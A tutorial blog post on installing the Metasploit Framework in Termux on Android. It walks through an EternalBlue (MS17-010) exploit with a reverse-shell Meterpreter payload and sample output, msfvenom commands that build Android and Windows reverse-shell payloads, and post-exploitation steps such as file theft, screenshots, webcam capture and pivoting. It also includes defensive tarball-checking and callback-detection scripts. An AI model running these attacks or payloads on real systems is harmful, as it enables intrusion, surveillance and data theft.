Metasploit Framework in Termux
The Metasploit Framework is one of the most powerful penetration testing platforms available, and now you can run it directly on your Android device using Termux. This comprehensive guide from Sandeep Tech will walk you through the entire process of installing, configuring, and using Metasploit in Termux for ethical hacking and security testing purposes.
What is Metasploit Framework?
Metasploit Framework is an open-source penetration testing platform that enables you to find, exploit, and validate vulnerabilities. It's one of the most widely used tools by security professionals, ethical hackers, and penetration testers worldwide. The framework provides a comprehensive suite of tools for developing and executing exploit code against a remote target machine.
Educational Purpose Only
Metasploit Framework should only be used for educational purposes and authorized security testing. Unauthorized use of penetration testing tools is illegal and unethical. Always obtain proper permission before conducting any security tests.
Why Use Metasploit in Termux?
Running Metasploit in Termux offers several advantages:
- Portability - Carry a powerful penetration testing platform in your pocket
- No Root Required - Works on non-rooted Android devices
- Cost-Effective - Free alternative to expensive penetration testing hardware
- Educational - Learn penetration testing techniques on the go
- Testing Environment - Quickly test your own networks for vulnerabilities
- Emergency Tool - Have a security toolkit available in emergency situations
Installation Guide
Installing Metasploit in Termux requires several steps due to its dependencies. Follow this guide carefully:
# Update and upgrade Termux packages
apt update && apt upgrade -y
Install the required dependencies:
# Install required packages
apt install wget curl git tar -y
Install the necessary development tools:
# Install development tools
pkg install openssl ruby make clang libffi libgmp libpcap postgresql readline sqlite -y
Install Bundler, then update RubyGems:
# Install Bundler (pinned to the version this guide uses)
gem install -v 1.17.2 bundler
# Update RubyGems
gem update --system
Now, let's install Metasploit Framework:
# Download Metasploit Framework
wget https://github.com/rapid7/metasploit-framework/archive/refs/tags/6.3.2.tar.gz
# Extract the archive
tar -xzf 6.3.2.tar.gz
# Navigate to the Metasploit directory
cd metasploit-framework-6.3.2
# Install the required gems
bundle install
Create a symbolic link to make msfconsole accessible from anywhere:
# Create a symbolic link
ln -sf "$PWD/msfconsole" /data/data/com.termux/files/usr/bin/msfconsole
# Make it executable
chmod +x /data/data/com.termux/files/usr/bin/msfconsole
Initialize the database:
# Initialize the database (run from the Metasploit source directory; only msfconsole was linked into PATH)
./msfdb init
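The download step above fetches a tarball and extracts it without any integrity check. The following is an added example, not part of the original guide: it compares the archive against a known SHA-256 digest and inspects member paths before extraction. The function names are illustrative and the expected digest is a placeholder you must obtain from a source you trust.

```shell
#!/bin/sh
# Added example: pre-extraction checks for a downloaded source tarball.
# The expected digest is a placeholder, not a real value for 6.3.2.tar.gz.

# verify_sha256 FILE EXPECTED_HEX -> 0 only if the file's SHA-256 matches
verify_sha256() {
    [ -f "$1" ] || return 1
    _want=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    _have=$(sha256sum "$1" | cut -d' ' -f1)
    [ "${#_want}" -eq 64 ] && [ "$_have" = "$_want" ]
}

# archive_paths_safe TARBALL TOPDIR -> 0 only if every member sits under
# TOPDIR/ and no member is absolute or contains a ".." path component
archive_paths_safe() {
    tar -tzf "$1" 2>/dev/null | awk -v top="$2" '
        { n++ }
        substr($0, 1, 1) == "/"              { bad = 1 }
        $0 != top && index($0, top "/") != 1 { bad = 1 }
        { k = split($0, part, "/")
          for (i = 1; i <= k; i++) if (part[i] == "..") bad = 1 }
        # An empty or unreadable archive (n == 0) is rejected as well
        END { if (bad || n == 0) exit 1 }'
}

# safe_extract TARBALL EXPECTED_HEX TOPDIR -> extracts only if both checks pass
safe_extract() {
    verify_sha256 "$1" "$2" || { echo "digest mismatch: $1" >&2; return 1; }
    archive_paths_safe "$1" "$3" || { echo "unexpected paths in: $1" >&2; return 1; }
    tar -xzf "$1"
}

# Usage with the file names from this guide:
#   EXPECTED_SHA256='<digest recorded from a trusted source>'
#   safe_extract 6.3.2.tar.gz "$EXPECTED_SHA256" metasploit-framework-6.3.2
```

Use `safe_extract` in place of the plain `tar -xzf` step; it refuses to unpack when either check fails.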
Getting Started with Metasploit
Now that Metasploit is installed, let's start it and explore its interface:
# Start Metasploit console
msfconsole
When you first start Metasploit, you'll see a welcome screen and the msfconsole prompt:
=[ metasploit v6.3.2-dev ]
+ -- --=[ 2235 exploits - 1193 auxiliary - 398 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Writing a custom meterpreter script? Check out the meterpreter scripting API documentation
msf6 >
The msfconsole prompt is where you'll enter all Metasploit commands. Let's explore some basic commands to get familiar with the interface.
Basic Usage and Commands
Here are some essential commands to get started with Metasploit:
Help and Information
# Show help menu
msf6 > help
# Show all commands
msf6 > ?
# Show information about a specific command
msf6 > ? search
Searching for Modules
# Search for exploits related to a specific service
msf6 > search type:exploit platform:windows smb
# Search for all modules related to Android
msf6 > search android
# Search for a specific module by name
msf6 > search eternalblue
Using Modules
# Use a specific module
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# Show information about the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > info
# Show options for the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
# Show advanced options for the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show advanced
# Show targets for the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets
Understanding Modules
Metasploit is modular, with each module serving a specific purpose. The main types of modules are:
- Exploits - Code that takes advantage of a vulnerability in a system
- Payloads - Code that runs on the target system after exploitation
- Auxiliary - Modules that perform scanning, fuzzing, sniffing, and other tasks
- Post - Modules that run on the target system after exploitation
- Evasion - Modules that help evade detection by security software
- Encoders - Modules that encode payloads to avoid detection
- Nops - Modules that generate no-operation instructions
Module Naming Convention
Exploit modules generally follow the naming convention type/platform/service/vulnerability. For example, exploit/windows/smb/ms17_010_eternalblue is an exploit for Windows systems targeting the SMB service with the MS17-010 vulnerability (EternalBlue). Other module types keep the type first but organise the rest of the path differently, as in auxiliary/scanner/portscan/tcp.
Working with Payloads
Payloads are the code that runs on the target system after successful exploitation. Metasploit offers several types of payloads:
Types of Payloads
- Singles - Self-contained payloads that include everything needed to run
- Stagers - Small payloads that connect back to the attacker to download the rest of the payload
- Stageless - Complete payloads that don't require a staging process
Popular Payloads
# List all available payloads
msf6 > show payloads
# Set a payload for the current exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
# Show options for the current module and the selected payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Custom Payloads
You can create custom payloads using msfvenom, which is included with Metasploit:
# Create a custom Android payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 R > /sdcard/apk.apk
# Create a custom Windows payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > payload.exe
Using Exploits
Exploits are the core of Metasploit. Let's walk through the process of using an exploit:
# Select an exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# Set the target IP address
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.200
# Set the payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
# Set the local host (your IP)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.100
# Set the local port
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
# Verify the settings
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
# Run the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
If the exploit is successful, you'll get a Meterpreter session on the target system:
[*] 192.168.1.200:445 - Detected SMB version: Windows 7 Professional 7601 Service Pack 1
[*] 192.168.1.200:445 - Target is likely vulnerable to MS17-010
[*] 192.168.1.200:445 - Connecting to target for exploitation.
[*] 192.168.1.200:445 - Target OS selected valid for OS automatically but we will verify the
[*] 192.168.1.200:445 - Target arch selected valid for arch automatically but we will verify
[*] 192.168.1.200:445 - Attempting to exploit target with MS17-010...
[*] 192.168.1.200:445 - Exploit successful, waiting for connection...
[*] 192.168.1.200:445 - Connection established, sending payload...
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.200:49158) at 2023-07-25 14:30:45
meterpreter >
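Seen from the network side, the session line above is an inbound SMB connection followed seconds later by the target connecting back to the same host on LPORT. The following added example (not part of the original guide) runs that correlation over constructed flow records; the record format, function names and time window are assumptions, and the logic is a heuristic rather than a signature.

```shell
#!/bin/sh
# Added example: flag a connection from an internal host back to a peer that
# opened SMB (445/tcp) to it moments earlier. Heuristic only; tune the window.

# Constructed flow records: epoch src_ip src_port dst_ip dst_port
sample_flows() {
    cat <<'EOF'
1690295440 192.168.1.50 51200 192.168.1.200 445
1690295441 192.168.1.200 49150 192.168.1.1 53
1690295442 192.168.1.100 40312 192.168.1.200 445
1690295445 192.168.1.200 49158 192.168.1.100 4444
1690295900 192.168.1.200 49201 192.168.1.50 8080
EOF
}

# detect_smb_callback WINDOW_SECONDS   (reads flow records on stdin)
# Prints one ALERT line per connection that goes from an SMB server back to
# its SMB client within WINDOW_SECONDS of the inbound 445/tcp flow.
detect_smb_callback() {
    awk -v win="$1" '
        # Remember when each client -> server SMB flow was last seen
        $5 == 445 { smb[$2, $4] = $1; next }
        {
            # Reverse direction: this flow runs from the server to the client
            if (($4, $2) in smb) {
                delta = $1 - smb[$4, $2]
                if (delta >= 0 && delta <= win)
                    printf "ALERT %s:%s -> %s:%s %ds after inbound SMB from %s\n",
                           $2, $3, $4, $5, delta, $4
            }
        }'
}

# Run over the constructed sample with a 60-second window
sample_flows | detect_smb_callback 60
```

With a 60-second window only the 192.168.1.200 to 192.168.1.100:4444 flow is reported; the later connection to 192.168.1.50 falls outside the window.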
Post-Exploitation
Once you have a Meterpreter session, you can perform various post-exploitation tasks:
# Get system information
meterpreter > sysinfo
# Get current user
meterpreter > getuid
# List processes
meterpreter > ps
# List files in current directory
meterpreter > ls
# Change directory
meterpreter > cd C:\\
# Upload a file to the target
meterpreter > upload /sdcard/file.txt C:\\
# Download a file from the target
meterpreter > download C:\\important_file.txt /sdcard/
# Take a screenshot
meterpreter > screenshot
# Start the webcam
meterpreter > webcam_start
# Execute a command on the target
meterpreter > execute -f cmd.exe -c "whoami"
# Get a shell on the target
meterpreter > shell
Advanced Features
Metasploit offers several advanced features for more sophisticated penetration testing:
Pivoting
Pivoting allows you to route traffic through a compromised system to access other systems on the network:
# Add a route through the compromised system
meterpreter > run post/multi/manage/autoroute
# Background the current session
meterpreter > background
# Use the new route to scan the internal network
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.2.0/24
msf6 auxiliary(scanner/portscan/tcp) > run
Session Management
Metasploit allows you to manage multiple sessions simultaneously:
# List all active sessions
msf6 > sessions
# Interact with a specific session
msf6 > sessions -i 1
# Background the current session
meterpreter > background
# Kill a session
msf6 > sessions -k 1
Database Integration
Metasploit can integrate with a database to store scan results and manage hosts:
# Check the database connection (msfconsole connects automatically once the database is initialized)
msf6 > db_status
# Add hosts to the database
msf6 > db_nmap -sV 192.168.1.0/24
# List all hosts in the database
msf6 > hosts
# List all services in the database
msf6 > services
# List all vulnerabilities in the database
msf6 > vulns
Ethical Considerations
While Metasploit is a powerful tool, it's important to use it ethically and responsibly:
- Authorization - Always obtain explicit permission before testing any system
- Scope - Clearly define the scope of your testing and stay within it
- Documentation - Document all your findings and actions
- Confidentiality - Keep all sensitive information secure
- Non-Destructive - Avoid actions that could disrupt services or cause data loss
- Legal Compliance - Follow all applicable laws and regulations
Legal Warning
Unauthorized use of Metasploit or any penetration testing tools is illegal in most jurisdictions. This tutorial is for educational purposes only. Always obtain proper permission before conducting any security tests.
Command Reference
Metasploit Commands
Command | Description | Example |
---|---|---|
msfconsole | Start the Metasploit console | msfconsole |
help | Show help menu | help |
search | Search for modules | search type:exploit platform:windows |
use | Select a module | use exploit/windows/smb/ms17_010_eternalblue |
info | Show information about the current module | info |
show options | Show options for the current module | show options |
set | Set a module option | set RHOSTS 192.168.1.100 |
set payload | Set the payload for the current module | set payload windows/meterpreter/reverse_tcp |
exploit | Launch the exploit | exploit |
sessions | List all active sessions | sessions |
db_nmap | Run Nmap and store results in the database | db_nmap -sV 192.168.1.0/24 |
You've now learned how to install and use Metasploit Framework in Termux. This powerful combination brings professional penetration testing capabilities to your Android device. For more tutorials and guides, check out other articles on Sandeep Tech. Remember to always use these tools ethically and with proper authorization.